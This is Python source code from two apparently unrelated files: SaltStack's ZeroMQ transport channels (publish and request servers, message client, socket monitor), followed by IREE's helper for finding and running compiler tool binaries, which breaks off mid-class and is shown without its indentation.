def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4506)) != 4506:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
log.debug(
"Connecting the Minion to the Master publish port, using the URI: %s",
self.master_pub,
)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
"""
Return the master publish port
"""
return _get_master_uri(
self.opts["master_ip"],
self.publish_port,
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_publish_port"),
)
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
"""
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
"""
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (
self.opts.get("__role") != "syndic"
and message_target not in ("broadcast", self.hexid)
) or (
self.opts.get("__role") == "syndic"
and message_target not in ("broadcast", "syndic")
):
log.debug("Publish received for not this minion: %s", message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(
"Invalid number of messages ({}) in zeromq pubmessage from master".format(
len(messages_len)
)
)
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
"""
Return the current zmqstream, creating one if necessary
"""
if not hasattr(self, "_stream"):
self._stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
return self._stream
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
"""
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
self._monitor = None
self._w_monitor = None
def zmq_device(self):
"""
Multiprocessing target for the zmq queue device
"""
self.__setup_signals()
salt.utils.process.appendproctitle("MWorkerQueue")
self.context = zmq.Context(self.opts["worker_threads"])
# Prepare the zeromq sockets
self.uri = "tcp://{interface}:{ret_port}".format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts["mworker_queue_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting mworker_queue niceness to %d",
self.opts["mworker_queue_niceness"],
)
os.nice(self.opts["mworker_queue_niceness"])
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Setting up the master communication server")
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise
except (KeyboardInterrupt, SystemExit):
break
def close(self):
"""
Cleanly shutdown the router socket
"""
if self._closing:
return
log.info("MWorkerQueue under PID %s is closing", os.getpid())
self._closing = True
if getattr(self, "_monitor", None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, "_w_monitor", None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, "clients") and self.clients.closed is False:
self.clients.close()
if hasattr(self, "workers") and self.workers.closed is False:
self.workers.close()
if hasattr(self, "stream"):
self.stream.close()
if hasattr(self, "_socket") and self._socket.closed is False:
self._socket.close()
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
"""
Starts ZMQ monitor for debugging purposes.
:return:
"""
# Socket monitor shall be used the only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
log.debug("Starting ZMQ monitor")
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug("ZMQ monitor has been started started")
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
"""
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Worker binding to socket %s", self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
"""
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
"""
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == "AuthenticationError":
log.debug(
"Minion failed to auth to master. Since the payload is "
"encrypted, it is not known which minion failed to "
"authenticate. It is likely that this is a transient "
"failure due to the master rotating its public key."
)
else:
log.error("Bad load from minion: %s: %s", exc_type, exc)
stream.send(self.serial.dumps("bad load"))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get("load"), dict):
log.error(
"payload and load must be a dict. Payload was: %s and load was %s",
payload,
payload.get("load"),
)
stream.send(self.serial.dumps("payload and load must be a dict"))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload["enc"] == "clear" and payload.get("load", {}).get("cmd") == "_auth":
stream.send(self.serial.dumps(self._auth(payload["load"])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send("Some exception handling minion payload")
log.error("Some exception handling a payload from minion", exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.send(self.serial.dumps(ret))
elif req_fun == "send":
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == "send_private":
stream.send(
self.serial.dumps(
self._encrypt_private(
ret,
req_opts["key"],
req_opts["tgt"],
)
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.send("Server-side exception handling payload")
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = "{} received a ".format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += "SIGINT"
elif signum == signal.SIGTERM:
msg += "SIGTERM"
msg += ". Exiting"
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
"""
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
its host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
"""
if hasattr(zmq, "TCP_KEEPALIVE") and opts:
if "tcp_keepalive" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE, opts["tcp_keepalive"])
if "tcp_keepalive_idle" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, opts["tcp_keepalive_idle"])
if "tcp_keepalive_cnt" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, opts["tcp_keepalive_cnt"])
if "tcp_keepalive_intvl" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, opts["tcp_keepalive_intvl"])
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
"""
Encapsulate synchronous operations for a publisher channel
"""
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get("pub_hwm", 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get("pub_hwm", 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get("pub_hwm", 1000))
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = "tcp://{interface}:{publish_port}".format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info("Starting the Salt Publisher on %s", pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug("Publish daemon getting data from puller %s", pull_uri)
package = pull_sock.recv()
log.debug("Publish daemon received payload. size=%d", len(package))
unpacked_package = salt.payload.unpackage(package)
unpacked_package = salt.transport.frame.decode_embedded_strs(
unpacked_package
)
payload = unpacked_package["payload"]
log.trace("Accepted unpacked package from puller")
if self.opts["zmq_filtering"]:
# if you have a specific topic list, use that
if "topic_lst" in unpacked_package:
for topic in unpacked_package["topic_lst"]:
log.trace(
"Sending filtered data over publisher %s", pub_uri
)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(
hashlib.sha1(
salt.utils.stringutils.to_bytes(topic)
).hexdigest()
)
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent")
# Syndic broadcast
if self.opts.get("order_masters"):
log.trace("Sending filtered data to syndic")
pub_sock.send(b"syndic", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent to syndic")
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace(
"Sending broadcasted data over publisher %s", pub_uri
)
pub_sock.send(b"broadcast", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Broadcasted data has been sent")
else:
log.trace(
"Sending ZMQ-unfiltered data over publisher %s", pub_uri
)
pub_sock.send(payload)
log.trace("Unfiltered data has been sent")
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise
except KeyboardInterrupt:
log.trace("Publish daemon caught Keyboard interupt, tearing down")
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
"""
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
"""
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
"""
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
"""
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
"""
Disconnect an existing publisher socket and remove it from the local
thread's cache.
"""
if hasattr(self._sock_data, "sock"):
self._sock_data.sock.close()
delattr(self._sock_data, "sock")
def publish(self, load):
"""
Publish "load" to minions. This send the load to the publisher daemon
process with does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list":
int_payload["topic_lst"] = load["tgt"]
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts["zmq_filtering"] and load["tgt_type"] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load["tgt"], tgt_type=load["tgt_type"])
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload["topic_lst"] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
"Sending payload to publish daemon. jid=%s size=%d",
load.get("jid", None),
len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug("Sent payload to publish daemon.")
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket.
"""
def __init__(self, opts, args=None, kwargs=None):
self._closing = False
super().__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# TODO: unit tests!
class AsyncReqMessageClient:
"""
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
"""
def __init__(self, opts, addr, linger=0, io_loop=None):
"""
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
"""
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
try:
if self._closing:
return
except AttributeError:
# We must have been called from __del__
# The python interpreter has nuked most attributes already
return
else:
self._closing = True
if hasattr(self, "stream") and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, "stream"):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, "RECONNECT_IVL_MAX"):
self.socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith("tcp://["):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, "IPV6"):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, "IPV4ONLY"):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug("Trying to connect to: %s", self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self.socket, io_loop=self.io_loop
)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug("Re-init ZMQ socket: %s", err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
"""
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
"""
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(
self, message, timeout=None, tries=3, future=None, callback=None, raw=False
):
"""
Return a future which will be completed when the message has a response
"""
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message
)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor:
__EVENT_MAP = None
def __init__(self, socket):
"""
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
"""
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(
self._monitor_socket, io_loop=io_loop
)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith("EVENT_"):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt["description"] = self.event_map[evt["event"]]
log.debug("ZeroMQ event: %s", evt)
if evt["event"] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
binaries.py
|
# Lint-as: python3
"""Utilities for locating and invoking compiler tool binaries."""
# Copyright 2020 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
import importlib
import io
import logging
import os
import platform
import shlex
import subprocess
import sys
import textwrap
import threading
from typing import List, Optional, Union
__all__ = [
"find_tool",
"invoke_immediate",
"invoke_pipeline",
"get_tool_path",
"CompilerToolError",
]
_BUILTIN_TOOLS = [
"ireec",
"iree-translate",
]
# In normal distribution circumstances, each named tool is associated with
# a python module that provides a `get_tool` function for getting its absolute
# path. This dictionary maps the tool name to the module.
_TOOL_MODULE_MAP = {
# Note that ireec is builtin, but if not found, it can be resolved
# in the external 'core' module. This is used for some outside packaging
# options.
"ireec": "iree.tools.core",
"iree-import-tflite": "iree.tools.tflite",
"iree-import-xla": "iree.tools.xla",
"iree-import-tf": "iree.tools.tf",
}
# Map of tool module to package name as distributed to archives (used for
# error messages).
_TOOL_MODULE_PACKAGES = {
"iree.tools.core": "<none>",
"iree.tools.tf": "iree-tools-tf",
"iree.tools.tflite": "iree-tools-tflite",
"iree.tools.xla": "iree-tools-xla",
}
# Environment variable holding directories to be searched for named tools.
# Delimitted by os.pathsep.
_TOOL_PATH_ENVVAR = "IREE_TOOL_PATH"
# We do complicated logging so retain our own Logger instance.
logger = logging.getLogger(__name__)
class CompilerToolError(Exception):
"""Compiler exception that preserves the command line and error output."""
def __init__(self, process: subprocess.CompletedProcess):
try:
errs = process.stderr.decode("utf-8")
except:
errs = str(process.stderr) # Decode error or other: best we can do.
tool_name = os.path.basename(process.args[0])
super().__init__(f"Error invoking IREE compiler tool {tool_name}\n"
f"Diagnostics:\n{errs}\n\n"
f"Invoked with:\n {tool_name} {' '.join(process.args)}")
def get_tool_path() -> List[str]:
"""Returns list of paths to search for tools."""
list_str = os.environ.get(_TOOL_PATH_ENVVAR)
if not list_str:
return []
return list_str.split(os.pathsep)
def find_tool(exe_name: str) -> str:
"""Finds a tool by its (extension-less) executable name.
Args:
exe_name: The name of the executable (extension-less).
Returns:
An absolute path to the tool.
Raises:
ValueError: If the tool is not known or not found.
"""
is_builtin = exe_name in _BUILTIN_TOOLS
if not is_builtin and exe_name not in _TOOL_MODULE_MAP:
raise ValueError(f"IREE compiler tool '{exe_name}' is not a known tool")
# First search an explicit tool path (from environment).
tool_path = get_tool_path()
for path_entry in tool_path:
if not path_entry:
continue
candidate_exe = os.path.join(path_entry, exe_name)
if _is_executable(candidate_exe):
return candidate_exe
if is_builtin:
# Get builtin tool.
candidate_exe = _get_builtin_tool(exe_name)
if _is_executable(candidate_exe):
return candidate_exe
# Fall-through and attempt to find it via a tools module.
# Attempt to load the tool module.
tool_module_name = _TOOL_MODULE_MAP[exe_name]
tool_module_package = _TOOL_MODULE_PACKAGES[tool_module_name]
try:
tool_module = importlib.import_module(tool_module_name)
except ModuleNotFoundError:
raise ValueError(
f"IREE compiler tool '{exe_name}' is not installed (it should have been "
f"found in the python module '{tool_module_name}', typically installed "
f"via the package {tool_module_package}).\n\n"
f"Either install the package or set the {_TOOL_PATH_ENVVAR} environment "
f"variable to contain the path of the tool executable "
f"(current {_TOOL_PATH_ENVVAR} = {repr(tool_path)}).") from None
# Ask the module for its tool.
candidate_exe = tool_module.get_tool(exe_name)
if (not _is_executable(candidate_exe)):
raise ValueError(
f"IREE compiler tool '{exe_name}' was located in module "
f"'{tool_module_name}' but the file was not found or not executable: "
f"{candidate_exe}")
return candidate_exe
def _get_builtin_tool(exe_name: str) -> Optional[str]:
# Transitional note: iree-translate is allowed and resolves to "ireec".
if exe_name == "iree-translate":
exe_name = "ireec"
if platform.system() == "Windows":
exe_name = exe_name + ".exe"
this_path = os.path.dirname(__file__)
tool_path = os.path.join(this_path, "..", "_mlir_libs", exe_name)
return tool_path
def _is_executable(candidate_exe: str) -> bool:
if not candidate_exe:
return False
if not os.path.isfile(candidate_exe):
return False
if not os.access(candidate_exe, os.X_OK):
return False
return True
def invoke_immediate(command_line: List[str],
*,
input_file: Optional[bytes] = None,
immediate_input=None):
"""Invokes an immediate command.
This is separate from invoke_pipeline as it is simpler and supports more
complex input redirection, using recommended facilities for sub-processes
(less magic).
Note that this differs from the usual way of using subprocess.run or
subprocess.Popen().communicate() because we need to pump all of the error
streams individually and only pump pipes not connected to a different stage.
Uses threads to pump everything that is required.
"""
if logger.isEnabledFor(logging.INFO):
logging.info("Invoke IREE Tool: %s", _quote_command_line(command_line))
run_args = {}
input_file_handle = None
stderr_handle = sys.stderr
try:
# Redirect input.
if input_file is not None:
input_file_handle = open(input_file, "rb")
run_args["stdin"] = input_file_handle
elif immediate_input is not None:
run_args["input"] = immediate_input
# Capture output.
# TODO(#4131) python>=3.7: Use capture_output=True.
run_args["stdout"] = subprocess.PIPE
run_args["stderr"] = subprocess.PIPE
process = subprocess.run(command_line, **run_args)
if process.returncode != 0:
raise CompilerToolError(process)
# Emit stderr contents.
_write_binary_stderr(stderr_handle, process.stderr)
return process.stdout
finally:
if input_file_handle:
input_file_handle.close()
def invoke_pipeline(command_lines: List[List[str]], immediate_input=None):
"""Invoke a pipeline of commands.
The first stage of the pipeline will have its stdin set to DEVNULL and each
subsequent stdin will derive from the prior stdout. The final stdout will
be accumulated and returned. All stderr contents are accumulated and printed
to stderr on completion or the first failing stage of the pipeline will have
an exception raised with its stderr output.
"""
logging.info(
"Invoke IREE Pipeline:\n %s",
"\n ".join([_quote_command_line(line) for line in command_lines]))
stages = []
pipeline_input = (subprocess.DEVNULL
if immediate_input is None else subprocess.PIPE)
prev_out = pipeline_input
stderr_handle = sys.stderr
# Create all stages.
for i in range(len(command_lines)):
command_line = command_lines[i]
popen_args = {
"stdin": prev_out,
"stdout": subprocess.PIPE,
"stderr": subprocess.PIPE,
}
process = subprocess.Popen(command_line, **popen_args)
prev_out = process.stdout
capture_output = (i == (len(command_lines) - 1))
stages.append(_PipelineStage(process, capture_output))
# Start stages.
for stage in stages:
stage.start()
# Pump input.
pipe_success = True
if immediate_input is not None:
try:
pipe_success = False
stages[0].process.stdin.write(immediate_input)
pipe_success = True
finally:
stages[0].process.stdin.close()
# Join.
for stage in stages:
stage.join()
# Check for errors.
for stage in stages:
assert stage.completed
if stage.completed.returncode != 0:
raise CompilerToolError(stage.completed)
# Broken pipe.
if not pipe_success:
raise CompilerToolError(stages[0].completed)
# Print any stderr output.
for stage in stages:
_write_binary_stderr(stderr_handle, stage.errs)
return stages[-1].outs
class _PipelineStage(threading.Thread):
"""Wraps a process and pumps its handles, waiting for completion."""
def __init__(self, process, capture_output):
super().__init__()
self.process = process
